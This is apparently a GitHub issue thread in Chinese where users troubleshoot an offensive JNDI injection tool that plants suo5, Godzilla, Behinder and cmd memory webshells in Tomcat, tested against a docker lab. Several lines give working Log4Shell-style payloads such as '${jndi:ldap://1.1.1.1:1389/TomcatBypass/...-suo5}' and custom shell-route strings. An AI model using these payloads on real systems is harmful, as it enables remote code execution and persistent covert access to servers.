Closed HiIkll closed 3 months ago
suo5内存马也是
这里需要改为JAVA_AES_RAW
大约5内存马也是
麻烦说下详细步骤
这边重新测试了一下,上回在打gsl码时多了个}操作失误,抱歉,gsl码子能正常连接了 suo5是配置的问题吗? 环境用到docker 靶场
/TomcatBypass/M-EX-MS-TSMSFromJMXS-suo5 这样的路由
如果你要自定义路径为hello,路由应该是这个
/TomcatBypass/M-EX-MS-TSMSFromJMXS-suo5/shell/L2hlbGxv
这个hello为他自身路由 /hello?payload=${jndi:ldap://xxxx} 意思是我需要重启定义一个路由才可以使用吗?
使用了自定义路由也连接不上/TomcatBypass/M-EX-MS-TSMSFromJMXS-suo5/shell/L3h4
你把他当成内存马就行了哥们 就是就是默认配置写入后,访问写入的qi4l路径,就是suo5的连接路径
写入后,你先访问一下写入的那个路径看看
我原先打的内存马就是没加路由的,/hello?payload=${jndi:ldap://1.1.1.1:1389/TomcatBypass/M-EX-MS-TSMSFromJMXS-suo5} 然后直接访问的/hello suo5连接的,最开始的图就是,但是连接失败了
没加额外参数应该访问的路径是/qi4l
我觉的是没问题的,加了自定义参数和gsl的suo5插件也都打不进去,像gsl,bx,cmd都是可以的,可能是环境问题,我到时候本地搭个测试下,感谢回答,麻烦了
我加了自定义参数可以打进去 你可以-y之后加-gen,看下生成的class文件代码,感谢反馈
cmd和bx马可以使用但是gsl马为何连不上是否为配置错误 使用为/TomcatBypass/M-EX-MS-TSMSFromJMXS-gzraw,加密器两个都试过